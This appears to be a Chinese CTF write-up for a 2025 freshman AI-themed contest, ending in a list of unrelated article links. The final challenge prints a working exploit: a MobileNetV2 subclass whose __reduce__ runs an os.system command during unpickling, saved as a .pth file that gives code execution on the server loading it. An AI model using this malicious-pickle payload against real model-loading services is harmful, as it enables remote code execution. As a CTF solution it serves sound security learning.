【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

[Aura JailBreak](#Aura JailBreak)

明阳未许

[🔥🌸 LittFlower: Fire Boom! 🌸🔥](#🔥🌸 LittFlower: Fire Boom! 🌸🔥)


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

复制代码
import torch
import torch.nn as nn
from torchvision import models
import builtins
import os

class MaliciousMobileNetV2(models.MobileNetV2):
    def __init__(self, num_classes=2):
        super().__init__(num_classes=num_classes)
        
    def __reduce__(self):
        
        state_dict = self.state_dict()

        fake_state_dict = state_dict.copy()
        
        if "classifier.1.weight" in fake_state_dict:
            del fake_state_dict["classifier.1.weight"]
        if "classifier.1.bias" in fake_state_dict:
            del fake_state_dict["classifier.1.bias"]
        cmd = "import os; os.system('cp /flag /app/static/flag.txt')"
        
        return (builtins.eval, (
            "(exec(cmd), state_dict)[1]", 
            {'cmd': cmd, 'state_dict': fake_state_dict}
        ))

if __name__ == '__main__':
    model = MaliciousMobileNetV2(num_classes=2)
    save_path = 'evil.pth'
    print(f"正在生成 Payload: {save_path} ...")
    torch.save(model, save_path)
    print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

相关推荐
童话名剑4 小时前
训练词嵌入(吴恩达深度学习笔记)
人工智能·深度学习·word2vec·词嵌入·负采样·嵌入矩阵·glove算法
桂花很香,旭很美4 小时前
智能体技术架构:从分类、选型到落地
人工智能·架构
HelloWorld__来都来了5 小时前
2026.1.30 本周学术科研热点TOP5
人工智能·科研
aihuangwu5 小时前
豆包图表怎么导出
人工智能·ai·deepseek·ds随心转
YMWM_6 小时前
深度学习中模型的推理和训练
人工智能·深度学习
中二病码农不会遇见C++学姐6 小时前
文明6-mod制作-游戏素材AI生成记录
人工智能·游戏
九尾狐ai6 小时前
从九尾狐AI案例拆解企业AI培训的技术实现与降本增效架构
人工智能
2501_948120156 小时前
基于RFID技术的固定资产管理软件系统的设计与开发
人工智能·区块链
(; ̄ェ ̄)。6 小时前
机器学习入门(十五)集成学习,Bagging,Boosting,Voting,Stacking,随机森林,Adaboost
人工智能·机器学习·集成学习
杀生丸学AI6 小时前
【物理重建】PPISP :辐射场重建中光度变化的物理合理补偿与控制
人工智能·大模型·aigc·三维重建·世界模型·逆渲染